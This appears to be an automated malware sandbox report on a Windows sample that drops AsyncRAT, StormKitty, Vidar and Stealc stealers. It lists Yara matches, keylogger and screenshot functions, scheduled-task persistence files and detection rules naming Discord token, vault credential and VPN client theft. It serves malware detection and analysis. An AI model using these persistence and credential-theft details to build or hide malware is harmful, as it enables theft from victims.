Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 11.3.skotes.exe.9d0e9d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.skotes.exe.9d0e9d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: skotes.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Contains functionality to capture screen (.Net source)

Source: t0IHakP.exe.11.dr, DesktopScreenshot.cs

.Net Code: Make

Contains functionality to log keystrokes (.Net Source)

Source: t0IHakP.exe.11.dr, Keylogger.cs	.Net Code: SetHook
Source: t0IHakP.exe.11.dr, Keylogger.cs	.Net Code: KeyboardLayout

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	File deleted: C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA\IVHSHTCODI.xlsx
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	File deleted: C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\AFWAAFRXKO.png
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	File deleted: C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\TTCBKWZYOC.pdf
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	File deleted: C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\FACWLRWHGG.pdf
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	File deleted: C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AFWAAFRXKO.pdf

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.2.52ba7a538c.exe.1e58000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 11.3.skotes.exe.9d0e9d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 20.2.52ba7a538c.exe.1e32000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 20.2.52ba7a538c.exe.1e0c000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 26.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 26.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 26.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 20.2.52ba7a538c.exe.1e32000.1.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 20.2.52ba7a538c.exe.1e0c000.3.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 20.2.52ba7a538c.exe.1e58000.2.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000014.00000002.3410807562.0000000001E58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000014.00000002.3410807562.0000000001E0C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: skotes.exe PID: 7608, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe, type: DROPPED	Matched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, type: DROPPED	Matched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io

PE file contains section with special chars

Source: i8Vwc7iOaG.exe	Static PE information: section name:
Source: i8Vwc7iOaG.exe	Static PE information: section name: .idata
Source: i8Vwc7iOaG.exe	Static PE information: section name:
Source: Y71AV1VIPLT8Y663WBDXSB.exe.0.dr	Static PE information: section name:
Source: Y71AV1VIPLT8Y663WBDXSB.exe.0.dr	Static PE information: section name: .idata
Source: 4XVI62Q28CHMU2Y2V4F8.exe.0.dr	Static PE information: section name:
Source: 4XVI62Q28CHMU2Y2V4F8.exe.0.dr	Static PE information: section name: .idata
Source: random[2].exe.3.dr	Static PE information: section name:
Source: random[2].exe.3.dr	Static PE information: section name: .idata
Source: FIJECAEHJJ.exe.3.dr	Static PE information: section name:
Source: FIJECAEHJJ.exe.3.dr	Static PE information: section name: .idata
Source: skotes.exe.5.dr	Static PE information: section name:
Source: skotes.exe.5.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name:
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name: .idata
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name:
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name:
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name: .idata
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name:
Source: k0ukcEH.exe.11.dr	Static PE information: section name:
Source: k0ukcEH.exe.11.dr	Static PE information: section name: .idata
Source: k0ukcEH.exe.11.dr	Static PE information: section name:
Source: random[4].exe.11.dr	Static PE information: section name:
Source: random[4].exe.11.dr	Static PE information: section name: .rsrc
Source: random[4].exe.11.dr	Static PE information: section name: .idata
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name:
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name: .rsrc
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name: .idata
Source: random[5].exe.11.dr	Static PE information: section name:
Source: random[5].exe.11.dr	Static PE information: section name: .idata
Source: random[5].exe.11.dr	Static PE information: section name:
Source: fe4b3524c6.exe.11.dr	Static PE information: section name:
Source: fe4b3524c6.exe.11.dr	Static PE information: section name: .idata
Source: fe4b3524c6.exe.11.dr	Static PE information: section name:
Source: random[4].exe0.11.dr	Static PE information: section name:
Source: random[4].exe0.11.dr	Static PE information: section name: .idata
Source: random[4].exe0.11.dr	Static PE information: section name:
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name:
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name: .idata
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name: .idata
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: fd096224d5.exe.11.dr	Static PE information: section name:
Source: fd096224d5.exe.11.dr	Static PE information: section name: .idata
Source: fd096224d5.exe.11.dr	Static PE information: section name:
Source: axplong.exe.21.dr	Static PE information: section name:
Source: axplong.exe.21.dr	Static PE information: section name: .idata
Source: axplong.exe.21.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	File created: C:\Windows\Tasks\axplong.job

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4DAC60	3_2_6C4DAC60
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C596C00	3_2_6C596C00
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5AAC30	3_2_6C5AAC30
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C52ECD0	3_2_6C52ECD0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4CECC0	3_2_6C4CECC0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5FAD50	3_2_6C5FAD50
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C59ED70	3_2_6C59ED70
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C658D20	3_2_6C658D20
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C65CDC0	3_2_6C65CDC0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C566D90	3_2_6C566D90
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4D4DB0	3_2_6C4D4DB0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C56EE70	3_2_6C56EE70
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5B0E20	3_2_6C5B0E20
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4DAEC0	3_2_6C4DAEC0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C570EC0	3_2_6C570EC0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C556E90	3_2_6C556E90
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C53EF40	3_2_6C53EF40
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C592F70	3_2_6C592F70
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C610F20	3_2_6C610F20
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4D6F10	3_2_6C4D6F10
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5AEFF0	3_2_6C5AEFF0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4D0FE0	3_2_6C4D0FE0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C618FB0	3_2_6C618FB0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4DEFB0	3_2_6C4DEFB0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5A4840	3_2_6C5A4840
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C520820	3_2_6C520820
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C55A820	3_2_6C55A820
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5D68E0	3_2_6C5D68E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C508960	3_2_6C508960
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C526900	3_2_6C526900
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5049F0	3_2_6C5049F0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5EC9E0	3_2_6C5EC9E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5909B0	3_2_6C5909B0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5609A0	3_2_6C5609A0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C58A9A0	3_2_6C58A9A0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C54CA70	3_2_6C54CA70
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C57EA00	3_2_6C57EA00
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C588A30	3_2_6C588A30
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C54EA80	3_2_6C54EA80
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5D6BE0	3_2_6C5D6BE0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C570BA0	3_2_6C570BA0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4E8460	3_2_6C4E8460
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C55A430	3_2_6C55A430
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C534420	3_2_6C534420
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5164D0	3_2_6C5164D0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C56A4D0	3_2_6C56A4D0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5FA480	3_2_6C5FA480
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C528540	3_2_6C528540
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5D4540	3_2_6C5D4540
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C570570	3_2_6C570570
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C618550	3_2_6C618550
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C532560	3_2_6C532560
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C55E5F0	3_2_6C55E5F0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C59A5E0	3_2_6C59A5E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4C45B0	3_2_6C4C45B0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C52C650	3_2_6C52C650
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4F46D0	3_2_6C4F46D0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C52E6E0	3_2_6C52E6E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C56E6E0	3_2_6C56E6E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C550700	3_2_6C550700
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4FA7D0	3_2_6C4FA7D0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C51E070	3_2_6C51E070
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C598010	3_2_6C598010
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C59C000	3_2_6C59C000
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4C8090	3_2_6C4C8090
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5AC0B0	3_2_6C5AC0B0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4E00B0	3_2_6C4E00B0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C538140	3_2_6C538140
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C546130	3_2_6C546130
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5B4130	3_2_6C5B4130
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4D01E0	3_2_6C4D01E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C568250	3_2_6C568250
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C558260	3_2_6C558260
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C59A210	3_2_6C59A210
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5A8220	3_2_6C5A8220
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C6562C0	3_2_6C6562C0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C59E2B0	3_2_6C59E2B0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5A22A0	3_2_6C5A22A0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4D8340	3_2_6C4D8340
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C612370	3_2_6C612370
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C566370	3_2_6C566370
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4D2370	3_2_6C4D2370
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5EC360	3_2_6C5EC360
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C542320	3_2_6C542320
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5243E0	3_2_6C5243E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C52E3B0	3_2_6C52E3B0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5023A0	3_2_6C5023A0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4D3C40	3_2_6C4D3C40
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5F9C40	3_2_6C5F9C40
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4E1C30	3_2_6C4E1C30
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C60DCD0	3_2_6C60DCD0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C591CE0	3_2_6C591CE0
